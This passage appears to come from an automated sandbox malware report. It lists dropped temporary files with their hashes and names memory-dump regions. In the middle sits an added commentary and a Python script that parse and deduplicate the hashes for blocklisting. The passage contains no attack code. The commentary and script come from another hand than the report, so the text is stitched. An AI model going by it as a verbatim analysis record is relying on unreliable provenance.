SHA256 8d23754e6b8bb933d79861540b50deca42e33ac4c3a6669c99fb368913b66d88
SHA512 f6a19d00896a63debb9ee7cdd71a92c0a3089b6f4c44976b9c30d97fcbaacd74a8d56150be518314fac74dd3ebea2001dc3859b0f3e4e467a01721b29f6227ba
-
\Windows\Installer\MSIFE97.tmp
MD5 3d24a2af1fb93f9960a17d6394484802
SHA1 ee74a6ceea0853c47e12802961a7a8869f7f0d69
SHA256 8d23754e6b8bb933d79861540b50deca42e33ac4c3a6669c99fb368913b66d88
SHA512 f6a19d00896a63debb9ee7cdd71a92c0a3089b6f4c44976b9c30d97fcbaacd74a8d56150be518314fac74dd3ebea2001dc3859b0f3e4e467a01721b29f6227ba
-
\Windows\Installer\MSIFF43.tmp
MD5 0be6e02d01013e6140e38571a4da2545
SHA1 9149608d60ca5941010e33e01d4fdc7b6c791bea
SHA256 3c5db91ef77b947a0924675fc1ec647d6512287aa891040b6ade3663aa1fd3a3
SHA512 f419a5a95f7440623edb6400f9adbfb9ba987a65f3b47996a8bb374d89ff53e8638357285485142f76758bffcb9520771e38e193d89c82c3a9733ed98ae24fcb
-
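The dropped-file list above repeats one digest under several temporary names (3d24a2af1fb93f9960a17d6394484802 appears as MSIEADF.tmp, MSI1.tmp, MSIFCEF.tmp, MSIFE19.tmp and MSIFE97.tmp), so turning the list into a blocklist or a hunt query means deduplicating by hash, not by path. The Python below is an added example, not part of the report, that parses this path-then-digests layout (also accepting digest labels fused onto the preceding token, as happens in extracted copies of such reports), collapses entries by SHA-256 and picks out the executable artefacts. The embedded sample is a constructed excerpt of the report's own paths and hashes; the function names and the executable-suffix list are ours.

```python
import re
from collections import OrderedDict

# Constructed excerpt of the dropped-file list above, in "label value" layout.
# Paths and digests are copied from this report; only the selection is ours.
SAMPLE = r"""
C:\Users\Admin\AppData\Local\Temp\MSIEADF.tmp
MD5 3d24a2af1fb93f9960a17d6394484802
SHA1 ee74a6ceea0853c47e12802961a7a8869f7f0d69
SHA256 8d23754e6b8bb933d79861540b50deca42e33ac4c3a6669c99fb368913b66d88
-
C:\Windows\Installer\MSI1.tmp
MD5 3d24a2af1fb93f9960a17d6394484802
SHA1 ee74a6ceea0853c47e12802961a7a8869f7f0d69
SHA256 8d23754e6b8bb933d79861540b50deca42e33ac4c3a6669c99fb368913b66d88
-
C:\Users\Admin\AppData\Roaming\SilkenMermaid Software\LibRender Software 2.3.0.1\install\311CE8D\etoapp.exe
MD5 fc03a93127893ea4a36af07852ec8d08
SHA1 c80462315369316921469260876d6194eeef754c
SHA256 4fde882f33a8c1fc374129cafd62c8320cd09dd555b25371d58767fa077e2271
-
C:\Users\Admin\AppData\Roaming\SilkenMermaid Software\LibRender Software 2.3.0.1\install\311CE8D\Themes\cosmo.css
MD5 c36c66f79aedd2688652d7fe7542192f
SHA1 a9abe0ea0d345df5e2bab84b549671ec209743ec
SHA256 060f9650ef9d5443703fb21abbfbb2cb286e0108698f81f689caabb72e460904
"""

# A digest line: optional label (longest alternatives first so "SHA256" is not
# read as "SHA1" + hex), optional whitespace, then hex. An unlabelled hex line
# is classified by length, which covers copies where the label was fused onto
# the previous line.
HASH_LINE = re.compile(r"^(?:(SHA512|SHA256|SHA1|MD5)\s*)?([0-9a-fA-F]{32,128})$")
LABEL_BY_LENGTH = {32: "md5", 40: "sha1", 64: "sha256", 128: "sha512"}
# Suffixes we treat as code; an assumption for this example.
CODE_SUFFIXES = (".exe", ".dll", ".msi")


def parse_entries(text):
    """Turn the report's path-then-digests layout into one dict per file."""
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line == "-":
            continue
        m = HASH_LINE.match(line)
        if m and current is not None:
            value = m.group(2).lower()
            label = (m.group(1) or LABEL_BY_LENGTH.get(len(value), "unknown")).lower()
            current[label] = value
            continue
        # Anything else starts a new entry; strip an "MD5" label fused onto the path.
        current = {"path": re.sub(r"MD5$", "", line)}
        entries.append(current)
    return entries


def dedupe_by_sha256(entries):
    """Collapse entries sharing a SHA-256, keeping every path it was seen at."""
    unique = OrderedDict()
    for entry in entries:
        digest = entry.get("sha256")
        if digest is None:
            continue
        slot = unique.setdefault(
            digest, {"md5": entry.get("md5"), "sha1": entry.get("sha1"), "paths": []})
        slot["paths"].append(entry["path"])
    return unique


def code_artifacts(unique):
    """Subset of unique digests that were written under an executable-looking name."""
    return OrderedDict(
        (digest, info) for digest, info in unique.items()
        if any(path.lower().endswith(CODE_SUFFIXES) for path in info["paths"])
    )


if __name__ == "__main__":
    for digest, info in dedupe_by_sha256(parse_entries(SAMPLE)).items():
        print(digest, len(info["paths"]), "path(s)")
        for path in info["paths"]:
            print("   ", path)
```

Hunting on the deduplicated SHA-256 set is the robust choice; the MD5 and SHA-1 values are kept only because some tooling still keys on them, and the path list is what tells you where to look for the same artefact on other hosts.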
memory/680-228-0x0000000000000000-mapping.dmp
memory/812-117-0x000002B8A0F00000-0x000002B8A0F02000-memory.dmp (Filesize 8KB)
memory/812-118-0x000002B8A0F00000-0x000002B8A0F02000-memory.dmp (Filesize 8KB)
memory/908-121-0x0000000002FD0000-0x0000000002FD1000-memory.dmp (Filesize 4KB)
memory/908-119-0x0000000000000000-mapping.dmp
memory/908-120-0x0000000002FD0000-0x0000000002FD1000-memory.dmp (Filesize 4KB)
memory/1044-242-0x0000016CA73F3000-0x0000016CA73F5000-memory.dmp (Filesize 8KB)
memory/1044-236-0x0000016C8ED60000-0x0000016C8ED62000-memory.dmp (Filesize 8KB)
memory/1044-244-0x0000016C8ED60000-0x0000016C8ED62000-memory.dmp (Filesize 8KB)
memory/1044-247-0x0000016C8ED60000-0x0000016C8ED62000-memory.dmp (Filesize 8KB)
memory/1044-245-0x0000016C8ED60000-0x0000016C8ED62000-memory.dmp (Filesize 8KB)
memory/1044-235-0x0000000000000000-mapping.dmp
memory/1044-243-0x0000016C8ED60000-0x0000016C8ED62000-memory.dmp (Filesize 8KB)
memory/1044-237-0x0000016C8ED60000-0x0000016C8ED62000-memory.dmp (Filesize 8KB)
memory/1044-241-0x0000016CA73F0000-0x0000016CA73F2000-memory.dmp (Filesize 8KB)
memory/1044-239-0x0000016C8ED60000-0x0000016C8ED62000-memory.dmp (Filesize 8KB)
memory/1044-238-0x0000016C8ED60000-0x0000016C8ED62000-memory.dmp (Filesize 8KB)
memory/1168-130-0x0000000000000000-mapping.dmp
memory/1168-131-0x0000000002700000-0x0000000002701000-memory.dmp (Filesize 4KB)
memory/1168-132-0x0000000002700000-0x0000000002701000-memory.dmp (Filesize 4KB)
memory/1756-233-0x0000000000000000-mapping.dmp
memory/2132-190-0x0000000000000000-mapping.dmp
memory/3852-196-0x000001B265770000-0x000001B265771000-memory.dmp (Filesize 4KB)
memory/3852-203-0x000001B27DCA0000-0x000001B27DCA2000-memory.dmp (Filesize 8KB)
memory/3852-204-0x000001B27DCA3000-0x000001B27DCA5000-memory.dmp (Filesize 8KB)
memory/3852-205-0x000001B27DCA6000-0x000001B27DCA8000-memory.dmp (Filesize 8KB)
memory/3852-201-0x000001B263CA0000-0x000001B263CA2000-memory.dmp (Filesize 8KB)
memory/3852-200-0x000001B27DE90000-0x000001B27DE91000-memory.dmp (Filesize 4KB)
memory/3852-234-0x000001B27DCA8000-0x000001B27DCA9000-memory.dmp (Filesize 4KB)
memory/3852-199-0x000001B263CA0000-0x000001B263CA2000-memory.dmp (Filesize 8KB)
memory/3852-198-0x000001B263CA0000-0x000001B263CA2000-memory.dmp (Filesize 8KB)
memory/3852-197-0x000001B263CA0000-0x000001B263CA2000-memory.dmp (Filesize 8KB)
memory/3852-195-0x000001B263CA0000-0x000001B263CA2000-memory.dmp (Filesize 8KB)
memory/3852-194-0x000001B263CA0000-0x000001B263CA2000-memory.dmp (Filesize 8KB)
memory/3852-193-0x000001B263CA0000-0x000001B263CA2000-memory.dmp (Filesize 8KB)
memory/3852-192-0x000001B263CA0000-0x000001B263CA2000-memory.dmp (Filesize 8KB)
memory/3852-191-0x0000000000000000-mapping.dmp
memory/4080-126-0x0000000000000000-mapping.dmp
memory/4080-127-0x0000000002810000-0x0000000002811000-memory.dmp (Filesize 4KB)
memory/4080-128-0x0000000002810000-0x0000000002811000-memory.dmp (Filesize 4KB)